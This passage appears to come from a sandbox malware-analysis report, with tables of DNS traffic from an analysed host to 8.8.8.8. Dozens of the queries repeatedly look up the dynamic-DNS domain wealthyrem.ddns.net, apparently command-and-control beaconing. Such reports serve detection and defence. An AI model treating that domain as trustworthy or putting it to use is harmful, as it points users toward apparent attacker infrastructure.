Aug 3, 2021 18:03:05.242752075 CEST	53	58468	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:05.250902891 CEST	58290	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:05.286665916 CEST	53	58290	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:07.470375061 CEST	54102	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:07.507150888 CEST	53	54102	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:09.468935966 CEST	55822	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:09.519459963 CEST	53	55822	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:09.669513941 CEST	64562	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:09.706294060 CEST	53	64562	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:11.892159939 CEST	61557	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:11.925440073 CEST	53	61557	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:13.824213982 CEST	54375	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:13.856751919 CEST	53	54375	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:14.111555099 CEST	49821	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:14.122904062 CEST	54012	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:14.144275904 CEST	53	49821	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:14.158137083 CEST	53	54012	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:16.298263073 CEST	63684	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:16.334412098 CEST	53	63684	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:18.577682018 CEST	62912	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:18.609951973 CEST	53	62912	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:20.823909998 CEST	60804	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:20.857263088 CEST	53	60804	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:23.382271051 CEST	60139	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:23.414494038 CEST	53	60139	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:25.568608999 CEST	59140	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:25.596151114 CEST	53	59140	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:27.786000013 CEST	50905	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:27.820512056 CEST	53	50905	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:29.970823050 CEST	53381	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:30.006797075 CEST	53	53381	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:32.280169010 CEST	54390	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:32.305104971 CEST	53	54390	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:34.624697924 CEST	63514	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:34.674105883 CEST	53	63514	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:36.843624115 CEST	50578	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:36.870151043 CEST	53	50578	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:39.766789913 CEST	63554	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:39.802304029 CEST	53	63554	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:42.572490931 CEST	63878	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:42.600116968 CEST	53	63878	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:44.770999908 CEST	53792	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:44.808240891 CEST	53	53792	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:46.998238087 CEST	65280	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:47.031979084 CEST	53	65280	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:49.284440041 CEST	55890	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:49.317770004 CEST	53	55890	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:51.488023996 CEST	57082	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:51.520335913 CEST	53	57082	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:53.693032026 CEST	64328	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:53.726793051 CEST	53	64328	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:55.907618999 CEST	54400	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:55.942558050 CEST	53	54400	8.8.8.8	192.168.2.7
Aug 3, 2021 18:03:58.144536972 CEST	52514	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:03:58.180290937 CEST	53	52514	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:00.352569103 CEST	53104	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:00.387912989 CEST	53	53104	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:02.567497015 CEST	54367	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:02.602576017 CEST	53	54367	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:04.826550007 CEST	64202	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:04.860369921 CEST	53	64202	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:07.021646976 CEST	62171	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:07.058125019 CEST	53	62171	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:09.210397959 CEST	50672	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:09.243210077 CEST	53	50672	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:11.397119045 CEST	63565	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:11.430680037 CEST	53	63565	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:13.742794991 CEST	62121	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:13.775387049 CEST	53	62121	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:16.432327032 CEST	59330	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:16.467454910 CEST	53	59330	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:18.622884989 CEST	51378	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:18.651566029 CEST	53	51378	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:20.852276087 CEST	58418	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:20.887847900 CEST	53	58418	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:23.043164968 CEST	63211	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:23.075534105 CEST	53	63211	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:25.248914957 CEST	57515	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:25.284774065 CEST	53	57515	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:27.449661016 CEST	56381	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:27.485532999 CEST	53	56381	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:29.668241978 CEST	58367	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:29.703403950 CEST	53	58367	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:31.869529963 CEST	56096	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:31.897357941 CEST	53	56096	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:34.244858027 CEST	60044	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:34.277890921 CEST	53	60044	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:36.483568907 CEST	61775	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:36.511339903 CEST	53	61775	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:38.694935083 CEST	50813	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:38.731224060 CEST	53	50813	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:40.927027941 CEST	65173	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:40.959721088 CEST	53	65173	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:43.148438931 CEST	51307	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:43.182590008 CEST	53	51307	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:45.355446100 CEST	51248	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:45.390722990 CEST	53	51248	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:47.541191101 CEST	50476	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:47.577378988 CEST	53	50476	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:49.799333096 CEST	63168	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:49.836647987 CEST	53	63168	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:53.196739912 CEST	62993	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:53.229334116 CEST	53	62993	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:55.389027119 CEST	56452	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:55.424460888 CEST	53	56452	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:57.591773987 CEST	54547	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:57.624083042 CEST	53	54547	8.8.8.8	192.168.2.7
Aug 3, 2021 18:04:59.795327902 CEST	49886	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:04:59.828027010 CEST	53	49886	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:01.986629009 CEST	56647	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:02.019203901 CEST	53	56647	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:04.179060936 CEST	58845	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:04.214956045 CEST	53	58845	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:06.370069027 CEST	59815	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:06.404021978 CEST	53	59815	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:08.592544079 CEST	59847	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:08.625143051 CEST	53	59847	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:11.766412020 CEST	57749	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:11.801686049 CEST	53	57749	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:13.996082067 CEST	64554	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:14.028672934 CEST	53	64554	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:16.184967995 CEST	61143	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:16.217849970 CEST	53	61143	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:18.386063099 CEST	60842	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:18.415306091 CEST	53	60842	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:20.575215101 CEST	54779	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:20.610532999 CEST	53	54779	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:22.764461040 CEST	59794	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:22.797117949 CEST	53	59794	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:25.003761053 CEST	51357	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:25.036484957 CEST	53	51357	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:27.221846104 CEST	51208	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:27.255598068 CEST	53	51208	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:30.703397036 CEST	51174	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:30.754188061 CEST	53	51174	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:33.031140089 CEST	59945	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:33.063888073 CEST	53	59945	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:35.231430054 CEST	65041	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:35.264806032 CEST	53	65041	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:37.450562000 CEST	57300	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:37.485719919 CEST	53	57300	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:39.653464079 CEST	52702	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:39.687992096 CEST	53	52702	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:41.900424957 CEST	62292	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:41.925355911 CEST	53	62292	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:44.099422932 CEST	57453	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:44.133326054 CEST	53	57453	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:46.318114996 CEST	50131	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:46.355571032 CEST	53	50131	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:49.050117970 CEST	52458	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:49.114978075 CEST	53	52458	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:51.279237032 CEST	55527	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:51.315931082 CEST	53	55527	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:53.496871948 CEST	63465	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:53.529486895 CEST	53	63465	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:55.702008009 CEST	63558	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:55.736372948 CEST	53	63558	8.8.8.8	192.168.2.7
Aug 3, 2021 18:05:57.925591946 CEST	53192	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:05:57.963054895 CEST	53	53192	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:00.129034042 CEST	59360	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:00.164889097 CEST	53	59360	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:02.342406988 CEST	61742	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:02.375046968 CEST	53	61742	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:04.561638117 CEST	65209	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:04.589843035 CEST	53	65209	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:06.782063007 CEST	63727	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:06.815399885 CEST	53	63727	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:08.985441923 CEST	58410	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:09.012912989 CEST	53	58410	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:09.822419882 CEST	64692	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:09.855053902 CEST	53	64692	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:11.207012892 CEST	56706	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:11.242706060 CEST	53	56706	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:13.475601912 CEST	57292	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:13.507868052 CEST	53	57292	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:15.661334038 CEST	59523	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:15.697130919 CEST	53	59523	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:17.860109091 CEST	63896	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:17.896765947 CEST	53	63896	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:20.232481003 CEST	63542	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:20.259336948 CEST	53	63542	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:22.489272118 CEST	63669	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:22.522475958 CEST	53	63669	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:24.708709002 CEST	60869	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:24.743968964 CEST	53	60869	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:26.908519983 CEST	55330	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:26.943700075 CEST	53	55330	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:29.123908043 CEST	62095	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:29.156662941 CEST	53	62095	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:31.318967104 CEST	51425	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:31.352756023 CEST	53	51425	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:33.526235104 CEST	53908	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:33.561729908 CEST	53	53908	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:35.725197077 CEST	59692	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:35.760827065 CEST	53	59692	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:37.910315990 CEST	59268	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:37.989125013 CEST	53	59268	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:41.046650887 CEST	55109	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:41.071511984 CEST	53	55109	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:43.236715078 CEST	56973	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:43.277365923 CEST	53	56973	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:45.437988043 CEST	57324	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:45.470468044 CEST	53	57324	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:47.642828941 CEST	49706	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:47.667928934 CEST	53	49706	8.8.8.8	192.168.2.7
Aug 3, 2021 18:06:49.829391956 CEST	49243	53	192.168.2.7	8.8.8.8
Aug 3, 2021 18:06:49.857407093 CEST	53	49243	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 17:58:16.579519987 CEST	192.168.2.7	8.8.8.8	0x6f82	Standard query (0)	clientconfig.passport.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:40.725461960 CEST	192.168.2.7	8.8.8.8	0x738d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:42.953814983 CEST	192.168.2.7	8.8.8.8	0x90c7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:45.163568974 CEST	192.168.2.7	8.8.8.8	0x56c0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:47.377684116 CEST	192.168.2.7	8.8.8.8	0x99ee	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:49.570652962 CEST	192.168.2.7	8.8.8.8	0x7ab2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:51.785244942 CEST	192.168.2.7	8.8.8.8	0x31cd	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:53.982469082 CEST	192.168.2.7	8.8.8.8	0xdaf9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:56.242800951 CEST	192.168.2.7	8.8.8.8	0x350	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:58.458664894 CEST	192.168.2.7	8.8.8.8	0xcfca	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:00.649725914 CEST	192.168.2.7	8.8.8.8	0xae34	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:02.853516102 CEST	192.168.2.7	8.8.8.8	0xf50e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:05.072191954 CEST	192.168.2.7	8.8.8.8	0x8ff2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:07.272125006 CEST	192.168.2.7	8.8.8.8	0xe6a3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:09.504134893 CEST	192.168.2.7	8.8.8.8	0x2701	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:11.823220015 CEST	192.168.2.7	8.8.8.8	0xf0b5	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:15.024833918 CEST	192.168.2.7	8.8.8.8	0x3e9e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:17.233573914 CEST	192.168.2.7	8.8.8.8	0x3d9e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:19.463181973 CEST	192.168.2.7	8.8.8.8	0x3138	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:21.663360119 CEST	192.168.2.7	8.8.8.8	0xc0be	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:23.853765965 CEST	192.168.2.7	8.8.8.8	0xed2c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:26.038454056 CEST	192.168.2.7	8.8.8.8	0xa6ab	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:28.311839104 CEST	192.168.2.7	8.8.8.8	0xe72	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:30.514034033 CEST	192.168.2.7	8.8.8.8	0x73	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:32.702085018 CEST	192.168.2.7	8.8.8.8	0x4dee	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:34.914820910 CEST	192.168.2.7	8.8.8.8	0x125	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:37.102677107 CEST	192.168.2.7	8.8.8.8	0x3b76	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:39.300961018 CEST	192.168.2.7	8.8.8.8	0xe6e0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:41.516207933 CEST	192.168.2.7	8.8.8.8	0x14ed	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:43.755731106 CEST	192.168.2.7	8.8.8.8	0x53a1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:45.963052034 CEST	192.168.2.7	8.8.8.8	0xd0b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:48.162206888 CEST	192.168.2.7	8.8.8.8	0xd981	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:50.369716883 CEST	192.168.2.7	8.8.8.8	0xe3ac	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:52.571094990 CEST	192.168.2.7	8.8.8.8	0x8a7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:54.775854111 CEST	192.168.2.7	8.8.8.8	0x2605	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:56.963598967 CEST	192.168.2.7	8.8.8.8	0x87f4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:59.232003927 CEST	192.168.2.7	8.8.8.8	0xb27a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:01.442179918 CEST	192.168.2.7	8.8.8.8	0x5296	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:03.636559010 CEST	192.168.2.7	8.8.8.8	0xac70	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:06.978085995 CEST	192.168.2.7	8.8.8.8	0xb39f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:09.167769909 CEST	192.168.2.7	8.8.8.8	0x6b0f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:11.370918036 CEST	192.168.2.7	8.8.8.8	0x1c7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:13.576644897 CEST	192.168.2.7	8.8.8.8	0xc54b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:15.953099012 CEST	192.168.2.7	8.8.8.8	0xcd0b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:18.953138113 CEST	192.168.2.7	8.8.8.8	0xf049	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:21.142889023 CEST	192.168.2.7	8.8.8.8	0x3892	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:23.342089891 CEST	192.168.2.7	8.8.8.8	0x991	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:25.529216051 CEST	192.168.2.7	8.8.8.8	0x25ef	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:27.731426954 CEST	192.168.2.7	8.8.8.8	0xdaab	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:29.919620037 CEST	192.168.2.7	8.8.8.8	0x9f46	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:32.171211004 CEST	192.168.2.7	8.8.8.8	0x5b39	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:34.362713099 CEST	192.168.2.7	8.8.8.8	0x3531	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:36.564641953 CEST	192.168.2.7	8.8.8.8	0xb7a6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:38.778537035 CEST	192.168.2.7	8.8.8.8	0x42e2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:40.987184048 CEST	192.168.2.7	8.8.8.8	0x20bf	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:43.195158958 CEST	192.168.2.7	8.8.8.8	0x27d7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:45.389694929 CEST	192.168.2.7	8.8.8.8	0x58b6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:47.632599115 CEST	192.168.2.7	8.8.8.8	0x5cc6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:49.815867901 CEST	192.168.2.7	8.8.8.8	0xe02b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:52.019388914 CEST	192.168.2.7	8.8.8.8	0x186d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:54.202487946 CEST	192.168.2.7	8.8.8.8	0x2186	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:56.397581100 CEST	192.168.2.7	8.8.8.8	0x2323	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:58.597013950 CEST	192.168.2.7	8.8.8.8	0xd3f6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:00.781600952 CEST	192.168.2.7	8.8.8.8	0x4b6d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:03.056288958 CEST	192.168.2.7	8.8.8.8	0x4c22	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:05.250902891 CEST	192.168.2.7	8.8.8.8	0xd143	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:07.470375061 CEST	192.168.2.7	8.8.8.8	0x9af0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:09.669513941 CEST	192.168.2.7	8.8.8.8	0xaf82	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
